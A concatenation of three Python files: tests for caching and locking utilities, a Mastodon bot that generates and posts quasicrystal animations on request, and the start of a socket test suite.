if isinstance(key, str):
return key.lower()
return super().__convert__(key)
d = LowerDict(a=-1, A=0)
self.assertEqual(d['A'], 0)
self.assertEqual(d['a'], 0)
self.assertIn('A', d)
self.assertIn('a', d)
self.assertEqual(d.get('A'), 0)
self.assertEqual(d.get('a'), 0)
d.setdefault('a', -1)
self.assertEqual(d, {'a': 0})
d['B'] = 1
self.assertEqual(d['B'], 1)
self.assertEqual(d['b'], 1)
self.assertIn('B', d)
self.assertIn('b', d)
self.assertEqual(d.get('B'), 1)
self.assertEqual(d.get('b'), 1)
d.setdefault('b', -1)
self.assertEqual(d, {'a': 0, 'b': 1})
del d['b']
self.assertEqual(d, {'a': 0})
self.assertEqual(d.pop('a'), 0)
self.assertEqual(d, {})
d.update(A=0)
self.assertEqual(d, {'a': 0})
d.update(A=0, b=1)
self.assertEqual(d, {'a': 0, 'b': 1})
d[0] = 'a'
self.assertEqual(d, {'a': 0, 'b': 1, 0: 'a'})
x = d.copy()
self.assertIsInstance(x, LowerDict)
self.assertEqual(x, d)
x[0] = 'b'
self.assertEqual(d, {'a': 0, 'b': 1, 0: 'a'})
self.assertEqual(x, {'a': 0, 'b': 1, 0: 'b'})
class RWLockTestCase(AyameTestCase):
def test_rwlock(self):
def reader():
with lock.read():
self.assertGreater(lock._rcnt, 0)
self.assertEqual(lock._rwait, 0)
time.sleep(0.01)
def writer():
with lock.write():
self.assertEqual(lock._rcnt, -1)
self.assertEqual(lock._rwait, 0)
time.sleep(0.01)
lock = util.RWLock()
for _ in range(10):
thr = threading.Thread(target=random.choice((reader, writer)))
thr.daemon = True
thr.start()
time.sleep(0.01)
time.sleep(0.17)
self.assertEqual(lock._rcnt, 0)
self.assertEqual(lock._rwait, 0)
self.assertEqual(threading.active_count(), 1)
def test_release(self):
lock = util.RWLock()
with self.assertRaises(RuntimeError):
lock.release_read()
with self.assertRaises(RuntimeError):
lock.release_write()
class LRUCacheTestCase(AyameTestCase):
def lru_cache(self, n):
c = LRUCache(n)
for i in range(n):
c[chr(ord('a') + i)] = i + 1
return c
def test_lru_cache(self):
c = LRUCache(3)
self.assertEqual(c.cap, 3)
self.assertEqual(len(c), 0)
self.assertIsInstance(c, collections.abc.MutableMapping)
def test_repr(self):
c = self.lru_cache(0)
self.assertEqual(repr(c), 'LRUCache([])')
c = self.lru_cache(3)
self.assertEqual(repr(c), "LRUCache([('c', 3), ('b', 2), ('a', 1)])")
def test_set(self):
c = self.lru_cache(3)
self.assertEqual(len(c), 3)
self.assertEqual(list(c), ['c', 'b', 'a'])
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertIn('a', c)
self.assertIn('b', c)
self.assertIn('c', c)
self.assertEqual(list(c.keys()), ['c', 'b', 'a'])
self.assertEqual(list(c.values()), [3, 2, 1])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
c['c'] = 3.0
c['b'] = 2.0
c['a'] = 1.0
self.assertEqual(list(reversed(c)), ['c', 'b', 'a'])
self.assertEqual(list(c.items()), [('a', 1.0), ('b', 2.0), ('c', 3.0)])
self.assertEqual(c.evicted, [])
c['a'] = 1
c['b'] = 2
c['c'] = 3
c['d'] = 4
self.assertEqual(list(reversed(c)), ['b', 'c', 'd'])
self.assertEqual(list(c.items()), [('d', 4), ('c', 3), ('b', 2)])
self.assertEqual(c.evicted[0:], [('a', 1.0)])
self.assertEqual(c.setdefault('c', 0), 3)
self.assertEqual(c.setdefault('d', 0), 4)
self.assertEqual(c.setdefault('e', 5), 5)
self.assertEqual(list(reversed(c)), ['c', 'd', 'e'])
self.assertEqual(list(c.items()), [('e', 5), ('d', 4), ('c', 3)])
self.assertEqual(c.evicted[1:], [('b', 2)])
def test_get(self):
c = self.lru_cache(3)
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
self.assertEqual(c['c'], 3)
self.assertEqual(c['b'], 2)
self.assertEqual(c['a'], 1)
self.assertEqual(list(reversed(c)), ['c', 'b', 'a'])
self.assertEqual(list(c.items()), [('a', 1), ('b', 2), ('c', 3)])
self.assertEqual(c.evicted, [])
self.assertEqual(c.peek('a'), 1)
self.assertEqual(c.peek('b'), 2)
self.assertEqual(c.peek('c'), 3)
self.assertEqual(list(reversed(c)), ['c', 'b', 'a'])
self.assertEqual(list(c.items()), [('a', 1), ('b', 2), ('c', 3)])
self.assertEqual(c.evicted, [])
self.assertEqual(c.get('a'), 1)
self.assertEqual(c.get('b'), 2)
self.assertEqual(c.get('c'), 3)
self.assertEqual(c.get('z', 26), 26)
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
def test_del(self):
c = self.lru_cache(3)
del c['a']
self.assertEqual(list(reversed(c)), ['b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2)])
self.assertEqual(c.evicted, [('a', 1)])
c = self.lru_cache(3)
del c['b']
self.assertEqual(list(reversed(c)), ['a', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('a', 1)])
self.assertEqual(c.evicted, [('b', 2)])
c = self.lru_cache(3)
del c['c']
self.assertEqual(list(reversed(c)), ['a', 'b'])
self.assertEqual(list(c.items()), [('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [('c', 3)])
c = self.lru_cache(3)
self.assertEqual(c.pop('b'), 2)
self.assertEqual(list(reversed(c)), ['a', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('a', 1)])
self.assertEqual(c.evicted, [('b', 2)])
with self.assertRaises(KeyError):
c.pop('b')
self.assertIsNone(c.pop('b', None))
c = self.lru_cache(3)
n = len(c)
for i in range(1, n + 1):
self.assertEqual(len(c.popitem()), 2)
self.assertEqual(len(c), n - i)
self.assertEqual(len(c.evicted), i)
with self.assertRaises(KeyError):
c.popitem()
def test_resize(self):
c = self.lru_cache(3)
c.cap = 2
self.assertEqual(list(reversed(c)), ['b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2)])
self.assertEqual(c.evicted[0:], [('a', 1)])
c['d'] = 4
self.assertEqual(list(reversed(c)), ['c', 'd'])
self.assertEqual(list(c.items()), [('d', 4), ('c', 3)])
self.assertEqual(c.evicted[1:], [('b', 2)])
c.cap = 1
self.assertEqual(list(reversed(c)), ['d'])
self.assertEqual(list(c.items()), [('d', 4)])
self.assertEqual(c.evicted[2:], [('c', 3)])
c['e'] = 5
self.assertEqual(list(reversed(c)), ['e'])
self.assertEqual(list(c.items()), [('e', 5)])
self.assertEqual(c.evicted[3:], [('d', 4)])
c.cap = 0
self.assertEqual(list(reversed(c)), [])
self.assertEqual(list(c.items()), [])
self.assertEqual(c.evicted[4:], [('e', 5)])
c.cap = -1
c['f'] = 6
c['g'] = 7
c['h'] = 8
c['i'] = 9
self.assertEqual(list(reversed(c)), ['f', 'g', 'h', 'i'])
self.assertEqual(list(c.items()), [('i', 9), ('h', 8), ('g', 7), ('f', 6)])
self.assertEqual(c.evicted[5:], [])
def test_clear(self):
c = self.lru_cache(3)
c.clear()
self.assertEqual(list(reversed(c)), [])
self.assertEqual(list(c.items()), [])
self.assertEqual(c.evicted, [])
def test_update(self):
c = self.lru_cache(3)
with self.assertRaises(NotImplementedError):
c.update()
def test_copy(self):
self._test_dup(lambda c: c.copy())
def test_pickle(self):
self._test_dup(lambda c: pickle.loads(pickle.dumps(c)))
def _test_dup(self, dup):
r = self.lru_cache(3)
c = dup(r)
self.assertIsNot(c, r)
self.assertEqual(c.cap, 3)
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
class LRUCache(util.LRUCache):
def on_init(self):
super().on_init()
self.evicted = []
def on_evicted(self, k, v):
super().on_evicted(k, v)
self.evicted.append((k, v))
class LFUCacheTestCase(AyameTestCase):
def lfu_cache(self, n):
c = LFUCache(n)
for i in range(n):
c[chr(ord('a') + i)] = i + 1
return c
def test_lfu_cache(self):
c = LFUCache(3)
self.assertEqual(c.cap, 3)
self.assertEqual(len(c), 0)
self.assertIsInstance(c, collections.abc.MutableMapping)
with self.assertRaises(RuntimeError):
c._lfu()
def test_repr(self):
c = self.lfu_cache(0)
self.assertEqual(repr(c), 'LFUCache([])')
c = self.lfu_cache(3)
self.assertEqual(repr(c), "LFUCache([('c', 3), ('b', 2), ('a', 1)])")
def test_set(self):
c = self.lfu_cache(3)
self.assertEqual(len(c), 3)
self.assertEqual(list(c), ['c', 'b', 'a'])
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertIn('a', c)
self.assertIn('b', c)
self.assertIn('c', c)
self.assertEqual(list(c.keys()), ['c', 'b', 'a'])
self.assertEqual(list(c.values()), [3, 2, 1])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
c['c'] = 3.0
c['b'] = 2.0
c['a'] = 1.0
self.assertEqual(list(reversed(c)), ['c', 'b', 'a'])
self.assertEqual(list(c.items()), [('a', 1.0), ('b', 2.0), ('c', 3.0)])
self.assertEqual(c.evicted[0:], [('c', 3), ('b', 2), ('a', 1)])
c['a'] = 1
c['b'] = 2
c['c'] = 3
c['d'] = 4
self.assertEqual(list(reversed(c)), ['b', 'c', 'd'])
self.assertEqual(list(c.items()), [('d', 4), ('c', 3), ('b', 2)])
self.assertEqual(c.evicted[3:], [('a', 1.0), ('b', 2.0), ('c', 3.0), ('a', 1)])
self.assertEqual(c.setdefault('d', 0), 4)
self.assertEqual(c.setdefault('e', 5), 5)
self.assertEqual(c.setdefault('c', 0), 3)
self.assertEqual(list(reversed(c)), ['e', 'd', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('d', 4), ('e', 5)])
self.assertEqual(c.evicted[7:], [('b', 2)])
def test_get(self):
c = self.lfu_cache(3)
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
self.assertEqual(c['c'], 3)
self.assertEqual(c['b'], 2)
self.assertEqual(c['a'], 1)
self.assertEqual(list(reversed(c)), ['c', 'b', 'a'])
self.assertEqual(list(c.items()), [('a', 1), ('b', 2), ('c', 3)])
self.assertEqual(c.evicted, [])
self.assertEqual(c.peek('a'), 1)
self.assertEqual(c.peek('b'), 2)
self.assertEqual(c.peek('c'), 3)
self.assertEqual(list(reversed(c)), ['c', 'b', 'a'])
self.assertEqual(list(c.items()), [('a', 1), ('b', 2), ('c', 3)])
self.assertEqual(c.evicted, [])
self.assertEqual(c.get('a'), 1)
self.assertEqual(c.get('b'), 2)
self.assertEqual(c.get('c'), 3)
self.assertEqual(c.get('z', 26), 26)
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
def test_del(self):
c = self.lfu_cache(3)
del c['a']
self.assertEqual(list(reversed(c)), ['b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2)])
self.assertEqual(c.evicted, [('a', 1)])
c = self.lfu_cache(3)
del c['b']
self.assertEqual(list(reversed(c)), ['a', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('a', 1)])
self.assertEqual(c.evicted, [('b', 2)])
c = self.lfu_cache(3)
del c['c']
self.assertEqual(list(reversed(c)), ['a', 'b'])
self.assertEqual(list(c.items()), [('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [('c', 3)])
c = self.lfu_cache(3)
self.assertEqual(c.pop('b'), 2)
self.assertEqual(list(reversed(c)), ['a', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('a', 1)])
self.assertEqual(c.evicted, [('b', 2)])
with self.assertRaises(KeyError):
c.pop('b')
self.assertIsNone(c.pop('b', None))
c = self.lfu_cache(3)
n = len(c)
for i in range(1, n + 1):
self.assertEqual(len(c.popitem()), 2)
self.assertEqual(len(c), n - i)
self.assertEqual(len(c.evicted), i)
with self.assertRaises(KeyError):
c.popitem()
def test_resize(self):
c = self.lfu_cache(3)
c.cap = 2
self.assertEqual(list(reversed(c)), ['b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2)])
self.assertEqual(c.evicted[0:], [('a', 1)])
c['d'] = 4
self.assertEqual(list(reversed(c)), ['c', 'd'])
self.assertEqual(list(c.items()), [('d', 4), ('c', 3)])
self.assertEqual(c.evicted[1:], [('b', 2)])
c.cap = 1
self.assertEqual(list(reversed(c)), ['d'])
self.assertEqual(list(c.items()), [('d', 4)])
self.assertEqual(c.evicted[2:], [('c', 3)])
c['e'] = 5
self.assertEqual(list(reversed(c)), ['e'])
self.assertEqual(list(c.items()), [('e', 5)])
self.assertEqual(c.evicted[3:], [('d', 4)])
c.cap = 0
self.assertEqual(list(reversed(c)), [])
self.assertEqual(list(c.items()), [])
self.assertEqual(c.evicted[4:], [('e', 5)])
c.cap = -1
c['f'] = 6
c['g'] = 7
c['h'] = 8
c['i'] = 9
self.assertEqual(list(reversed(c)), ['f', 'g', 'h', 'i'])
self.assertEqual(list(c.items()), [('i', 9), ('h', 8), ('g', 7), ('f', 6)])
self.assertEqual(c.evicted[5:], [])
def test_clear(self):
c = self.lfu_cache(3)
c.clear()
self.assertEqual(list(reversed(c)), [])
self.assertEqual(list(c.items()), [])
self.assertEqual(c.evicted, [])
def test_update(self):
c = self.lfu_cache(3)
with self.assertRaises(NotImplementedError):
c.update()
def test_copy(self):
self._test_dup(lambda c: c.copy())
def test_pickle(self):
self._test_dup(lambda c: pickle.loads(pickle.dumps(c)))
def _test_dup(self, dup):
f = self.lfu_cache(3)
c = dup(f)
self.assertIsNot(c, f)
self.assertEqual(c.cap, 3)
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
freq = c._head.next
self.assertEqual(freq.value, 1)
self.assertEqual(freq.len, 3)
self.assertEqual(c._head.prev.value, 1)
f = self.lfu_cache(3)
f['b']
f['c']
f['c']
c = dup(f)
self.assertIsNot(c, f)
self.assertEqual(c.cap, 3)
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
freq = c._head.next
self.assertEqual(freq.value, 1)
self.assertEqual(freq.len, 1)
self.assertEqual(freq.head.key, 'a')
self.assertEqual(freq.head.value, 1)
freq = c._head.next.next
self.assertEqual(freq.value, 2)
self.assertEqual(freq.len, 1)
self.assertEqual(freq.head.key, 'b')
self.assertEqual(freq.head.value, 2)
freq = c._head.next.next.next
self.assertEqual(freq.value, 3)
self.assertEqual(freq.len, 1)
self.assertEqual(freq.head.key, 'c')
self.assertEqual(freq.head.value, 3)
self.assertEqual(c._head.prev.value, 3)
class LFUCache(util.LFUCache):
def on_init(self):
super().on_init()
self.evicted = []
def on_evicted(self, k, v):
super().on_evicted(k, v)
self.evicted.append((k, v))
|
quasibot_mastoonly.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import sys
import random
import hashlib
import os
import atexit
import json
import traceback
import subprocess
from subprocess import call
from multiprocessing import Process, Queue, Value
from mastodon import Mastodon
wordfile = open("wordlist.txt", "r")
wordlist = wordfile.readlines()
wordfile.close()
# Thread handler that adds users that @ the bot to a queue
replyQueue = Queue()
userCount = Value('i', 0)
def getReplies():
mastodon_api_2 = Mastodon(
api_base_url = "https://botsin.space/",
access_token = "mastodon_user.secret"
)
lastIdMastodon = None
initialRun = True
notedUsers = []
if os.path.exists('served.json'):
with open('served.json', 'r') as f:
notedUsers = json.load(f)
print("initial noted: " + str(notedUsers))
resetNoted = 0
while(True):
try:
replies = None
if lastIdMastodon == None:
replies = mastodon_api_2.notifications()
else:
print("Mastodon: Fetching replies since " + str(lastIdMastodon))
replies = mastodon_api_2.notifications(since_id = lastIdMastodon)
if len(replies) > 0:
lastIdMastodon = replies[0]["id"]
replies.reverse()
if(len(notedUsers) > 300):
notedUsers = notedUsers[len(notedUsers) - 300:]
for reply in replies:
if reply["type"] == "mention":
replyQueue.put((reply["status"]["account"]["acct"], "mastodon", str(reply["status"]["id"])))
if initialRun == False and not reply["status"]["account"]["acct"] in notedUsers:
allowFor = "some time"
if userCount.value > 7:
allowFor = "several hours"
if userCount.value == 0:
mastodon_api_2.status_reply(reply["status"], "I'll get right on it! Please allow for a few minutes for quasicrystal generation.", visibility="direct", untag=True)
else:
mastodon_api_2.status_reply(reply["status"], "Request received! The number of quasicrystals ahead of yours in the queue is around " + str(userCount.value) + ". Please allow for " + allowFor + " until your quasicrystal is ready.", visibility="direct", untag=True)
notedUsers.append(reply["status"]["account"]["acct"])
userCount.value += 1
print("Mastodon: New entry to reply queue: " + str(reply["status"]["account"]["acct"]))
except Exception as e:
print("Mastodon: Error in fetch replies: " + str(e))
time.sleep(60 * 5)
initialRun = False
if resetNoted != int(time.time() / (60.0*60.0*24.0)):
resetNoted = int(time.time() / (60.0*60.0*24.0))
notedUsers = []
time.sleep(60 * 5)
Process(target = getReplies, daemon = True).start()
mastodon_api = Mastodon(
api_base_url = "https://botsin.space/",
access_token = "mastodon_user.secret"
)
servedUsers = []
nextSeeds = []
if os.path.exists("served.json"):
with open('served.json', 'r') as f:
servedUsers = json.load(f)
else:
# Clear user queue once on startup
time.sleep(10)
debugExclude = []
while(not replyQueue.empty()):
servedUser = replyQueue.get()
if not servedUser in debugExclude:
servedUsers.append(servedUser[0])
else:
print("Excluding " + str(servedUser) + " from initial queue wipe due to debug exclude")
nextSeeds.append(servedUser)
if os.path.exists("seeds.json"):
with open('seeds.json', 'r') as f:
nextSeeds = json.load(f)
def dump_state():
global servedUsers
global nextSeeds
print("Exiting, dumping state")
continueQueueGet = True
while continueQueueGet:
try:
print("Polling user queues.")
user = replyQueue.get(False)
except:
continueQueueGet = False
break
if user != None:
if not user[0] in servedUsers and not user in nextSeeds:
print("Appending " + str(user) + " to work queue.")
nextSeeds.append(user)
servedUsers.append(user[0])
if(len(servedUsers) > 300):
servedUsers = servedUsers[len(servedUsers) - 300:]
else:
continueQueueGet = False
with open('served.json', 'w') as f:
json.dump(servedUsers, f)
with open('seeds.json', 'w') as f:
json.dump(nextSeeds, f)
atexit.register(dump_state)
startTime = time.time()
pauseTime = 60 * 60 * 3
daySeed = 0
daySeedPhrase = ""
while(True):
checkWorkOnce = True
while(checkWorkOnce or len(nextSeeds) == 0 or (time.time() - startTime > pauseTime)):
userCount.value = len(nextSeeds)
checkWorkOnce = False
print("Checking new work...")
continueQueueGet = True
while continueQueueGet:
try:
print("Polling user queues.")
user = replyQueue.get(False)
except:
continueQueueGet = False
break
if user != None:
if not user[0] in servedUsers and not user in nextSeeds:
print("Appending " + str(user) + " to work queue.")
nextSeeds.append(user)
servedUsers.append(user[0])
if(len(servedUsers) > 300):
servedUsers = servedUsers[len(servedUsers) - 300:]
else:
continueQueueGet = False
if(time.time() - startTime > pauseTime):
print("Time for seed post, prepending to work queue...")
startTime = time.time()
nextSeeds = [("___GEN___", "both")] + nextSeeds
print("Sleeping until next check.")
time.sleep(60)
if daySeed != int(time.time() / (60.0*60.0*24.0)):
daySeed = int(time.time() / (60.0*60.0*24.0))
daySeedPhrase = ""
for i in range(0, 5):
daySeedPhrase += random.choice(wordlist).rstrip() + " "
print(daySeedPhrase + str(daySeed))
mastodon_api.status_post("It's a new day, and seeds have been changed! Todays lucky animals are: " + daySeedPhrase)
servedUsers = []
print("Current queue: " + str(nextSeeds))
userCount.value = len(nextSeeds)
seeduser = nextSeeds.pop(0)
seedphrase = seeduser[0] + " " + daySeedPhrase
userSpec = True
if(seedphrase == "___GEN___"):
seedphrase = ""
userSpec = False
for i in range(0, 5):
seedphrase += random.choice(wordlist).rstrip() + " "
try:
seedhash = str(abs(int(hashlib.sha1(seedphrase.encode("utf-8")).hexdigest(), 16)) % 4294967294)
if not os.path.exists("done/" + seedhash + ".gif"):
print("seedphrase (no hash): " + seedphrase)
subprocess.call(["python3", "genquasi.py", seedhash])
subprocess.call(["ffmpeg", "-f", "lavfi", "-i", "anullsrc=channel_layout=stereo:sample_rate=44100", "-f", "gif", "-i", seedhash + ".gif", "-shortest", "-c:v", "libx264", "-b:v", "1M", "-pix_fmt", "yuv420p", "-c:a", "aac", seedhash + "_nl.mp4"])
listfile = open(seedhash + ".txt", "w")
for i in range(0, 10):
listfile.write("file '" + seedhash + "_nl.mp4'\n")
listfile.close()
subprocess.call(["ffmpeg", "-f", "concat", "-i", seedhash + ".txt", "-c:a", "copy", "-c:v", "copy", seedhash + ".mp4"])
subprocess.call(["mv", seedhash + ".gif", "done"])
subprocess.call(["mv", seedhash + ".mp4", "done"])
subprocess.call(["rm", seedhash + "_nl.mp4"])
subprocess.call(["rm", seedhash + ".txt"])
mediaFile = "done/" + seedhash + ".gif"
if os.path.getsize(mediaFile) > 1024 * 1024 * 3.9:
mediaFile = "done/" + seedhash + ".mp4"
except:
print("Encountered error during encode. Link-only tweet.")
mediaFile = None
if not os.path.exists(mediaFile):
mediaFile = None
hqLink = "http://aka-san.halcy.de/quasi/" + seedhash + ".gif"
print("HQ link: " + hqLink)
# Post to Mastodon
try:
if seeduser[1] == "mastodon" or seeduser[1] == "both":
if mediaFile != None:
print("Mastodon media upload... mediafile is " + mediaFile)
mediaIdsMastodon = [mastodon_api.media_post(mediaFile)["id"]]
else:
mediaIdsMastodon = []
print("Tooting...")
if userSpec == False:
mastodon_api.status_post("seed phrase: " + seedphrase + "(HQ: " + hqLink + " )", media_ids = mediaIdsMastodon)
else:
reply_status = mastodon_api.status(seeduser[2])
mastodon_api.status_reply(reply_status, "here is your personal quasicrystal: (HQ: " + hqLink + " )", media_ids = mediaIdsMastodon, visibility="public", untag=True)
except:
print("Encountered error in post toot. Trying HQ only.")
e = sys.exc_info()[0]
print("Exception was: " + str(e))
traceback.print_exc()
try:
if userSpec == False:
mastodon_api.status_post("seed phrase: " + seedphrase + "(HQ: " + hqLink + " )")
else:
mastodon_api.status_post("@" + seedphrase + " here is your personal quasicrystal: (HQ: " + hqLink + " )")
except:
print("HQ only toot failed. Skipping.")
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import string
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
try:
import _thread as thread
import threading
except ImportError:
thread = None
threading = None
try:
import _socket
except ImportError:
_socket = None
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_RDS = _have_socket_rds()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
if threading:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
self.clientSetUp()
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
